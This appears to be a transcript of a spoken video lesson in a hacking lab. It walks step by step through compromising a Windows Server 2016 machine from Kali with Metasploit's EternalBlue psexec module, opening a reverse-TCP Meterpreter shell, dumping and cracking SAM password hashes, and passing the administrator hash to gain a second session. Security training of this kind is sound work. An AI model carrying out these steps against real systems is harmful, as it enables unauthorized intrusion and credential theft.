It is time to play
Pass the Hash.
You know, sometimes passwords are just not worth trying to crack. But sometimes also you can get lucky and be able to take hash dumps of those passwords and use those instead. You're going to need to have Server 2016 open, and you're going to need to have Kali open. Make sure they can ping each other. Make sure you know the IP address of both of them. You're going to need that information. Open up Metasploit in Kali. So you come over to Applications, you come over to Exploitation Tools, and you open the Metasploit framework. Let's get started. Switch to Server 2016 and open a command prompt in Administrator Privilege. That's crucial. Check your IP address, yours will be different from mine, and make note of it because you'll need it. Then let's make sure we have a few users so we can dump their hashes. We'll use the net user command. You can see I already have some users here. We're going to type net user and create a few more people. So net and then user, make up some username. I don't care what, make up your own. And then some password, whatever you like. I'm just going to use a dumb one right here. Capital P at SSW0RD. Oh, whoops. You also have to type /add and then press enter. Let's create another person. Net user Jack. And what's Jack's password? Make up something, make up something. Oh, something really dumb. Password bang. And add. Okay, that's good. And if we just type net user, we can see that we have all these different people, including the ones we just created. We have a variety of users. We're ready to dump hashes. We also have the administrator, as you can see. So let's get on it. Switch to Kali and make sure you have the Metasploit framework open. Just first of all, let's compromise Server 2016. We know that it is susceptible to several of the Eternal blue variants. So let's search Eternal. And let's go find that one that works on PowerShell. This one right here, the PSExec. Works pretty much every time. And since it's not a buffer overflow, you can keep on using it. It basically takes advantage of a race condition, meaning a time gap in time of check, time of use. So you can sneak in there, you can race in there from when something is validated to when it is actually run. Okay, so let's use and let's paste this in. And let's set the payload to our old friend, Windows, but this Server 2016 is an x64 interpreter. If you don't specify the architecture properly, the payload won't run properly. /TCP. Let's show options. What do we have to type? We do have to say the Kali IP. We do need to provide a user and password. I mean, you don't have to, but your chance of success will be dramatically diminished if you don't. And we do need to say who the target is. Okay, so let's do that. Let's set the remote host 192.168.98.166. That's Server 2016. And Kali is what? If config. Let's look it up. Kali is again 175. Okay. Set the listener host to 192.168.98.175. And let us set the SMB user, which we saw back here when we looked, the SMB user and the SMB pass. Well, fortunately, we managed to social engineer something out of Moo. So set SMB user Moo, set SMB pass, and Moo's password is capital PA22W0RD. Enter. Moo does not need to be an administrator for this to work. Okay, so now, if we haven't forgotten anything, let's try to run and see if we get a prompt. Okay, and sometimes you have to do this a couple times. I mean, if it times out and you get a whole bunch of Ruby errors, just wait a moment and just hit run again. But we've got an interpreter prompt, so that's all good. If we drop to shell and we say host name, who are you, what are you? Oh, you've got one of those weird Windows names that are just kind of random. If we sysinfo, who are you, what are you? Oops, I can't sysinfo from the Windows shell. If we exit and get back to interpreter and sysinfo, we can see that you are Windows 2016. Very good, very good. Okay, so while we're here, let us do a hash dump. Now you have two choices, and it kind of depends on your target. You could just try hash dump and see if that's good enough. And the hashes, of course, start after the username, administrator. This part is the relative ID. So the RID is the last part of the security ID, the SID. Administrator is always 500. And if it starts with 1,000, that means it was user created. So curly is like the 13th user. Guest is a system one, 501. Haxor is 1008. So the hash is after the colon after the RID. So in other words, the hash starts here. And it goes all the way down here. And you notice there's actually two hashes, this one and then this one. And it stops just before those 3 colons. And that's the hash. Now, sometimes you'll see the hash, but it doesn't work so well. So another option you can do, and this is for some of the older targets, like your XP and stuff. You could say run post /windows/gather/hash dump. This is one of those older scripts. Press enter. And it tends to work much better on some of the older things. So it's grabbing the syskey boot key, and which was something Microsoft created to try to prevent the very thing that we're doing right now. The syskey basically encrypts the security account manager, the SAM password file. Well, that's actually where users and passwords are stored. So anyway, we still see those same people here. Here's Sally, Manny, Sue, Curly, Jack, etc. And there's Moo. Okay, so we know this much, all right? Now, we could just, since we have the hashes handy right there, we could just try to do a fast crack right now. I mean, we could just try that. We could run auxiliary, analyze, and then JTR, that's for John the Ripper, crack _ fast. JTR _ crack _ fast. And we could try that. Just hit enter and see if it manages to crack any of these. Give it a shot here. So it's temporarily writing out a word list here and temporarily putting hashes here. And so it's loading some hashes and it's cracking some of them. And it's giving some warnings about mixed character sets. And okay, so it's come up with a few things. It's come up with a couple of things, but there's some that are not there. Like I don't see Haxor, I don't see Moo, I don't see Curly, so some of these are missing. So if you just say, okay, well, maybe we need to just pass the hash on some of these. Now, I have to tell you, pass the hash, there is a registry key and a security policy that basically states that only the administrator can have this happen. Now, there are some things we can set that will allow anyone in the admins group to have their hash passed. But we're just going to say administrator. Now, I happen to know that this old password for administrator is actually old and no longer valid. And you might say, well, why do we even have some of these here? The reason why is that Windows is permitted to cache old passwords that aren't even valid anymore. And that's a registry setting as well. So I happen to know that this is not the password because if we try it, it's not going to work. All right, so let's go back to the administrator hash. And let's just go grab this hash right here. We're just going to grab the administrator hash just like this. And we're going to right-click and copy it. And we're going to background this session, and we're going to start a whole new session with a different attack. And it's not a buffer overflow or anything. So, oh, look at this. Look at this. John did manage to get it. I'm chatting away, and it got it while I was talking. Wow, look at that. It did get these. Oh, look at that. Look at that. See what you get for just talking away? Okay, well, let's pretend, though, that we didn't get some of these passwords, that we don't know what the administrator password is, but we do know the hash. Let's pretend that. Let's background this session right here. So we've got our first interpreter session just in the background so we can load another module and we can run something else. So what we're going to do is we're going to, instead, we're going to just use exploit. And we're just going to run something totally different here. Let's see, what one do we want? We want Windows SMB, just psexec. And this is just getting a psexec, which is a sysinternals thing, but it works against PowerShell. So we want this. And we're just going to log in. It doesn't really like hack anything. It'll just allow us to test a password here and to run some commands. We just want to see if our little password is going to work. So let's show options. And I do have to say the remote host, it's a login, so the port is okay. We do need, of course, to provide a username and a password. And we do want to set a payload. Set payload, our old friend, Windows, but it is an x64 interpreter, reverse TCP. And if we're lucky, then we'll have 2 interpreter sessions running. Set the listener host, which is Kali 192.168.98.175. Set the remote host, which is server 2016 192.168.98.166. And set the SMB user is administrator, and set the SMB pass. Now let's pretend we don't know the administrator's password. We can just right click and paste. Now if I got the correct one and not one of the old ones, then this is going to work. If it says that it's wrong, then it's the wrong password. Okay, anything else to set here? Anything else we need to set? I think we're ready to rock. Let's exploit or run. I'm in an exploit mode. Hit it. And if we're lucky, it will be accepted. Look at that. Look at that. Authenticating to, of course, the login port 445 as user administrator. Looks like it made it, selecting PowerShell target and executing the payload. So it uses psexec targets PowerShell. So don't try to use anything psexec against something that doesn't have PowerShell, which would be like XP or Server 2003. It's got to have PowerShell. And we sent a stage, and Meterpreter Session 2 is opened. Yay! We have successfully hacked into our target. We knew the administrator name. We did not know the password, but that's okay. We passed the hash, and we are in. And now we can do all sorts of things in the background to our target because we have a session. And that's how Pass the Hash works. See you in the next activity.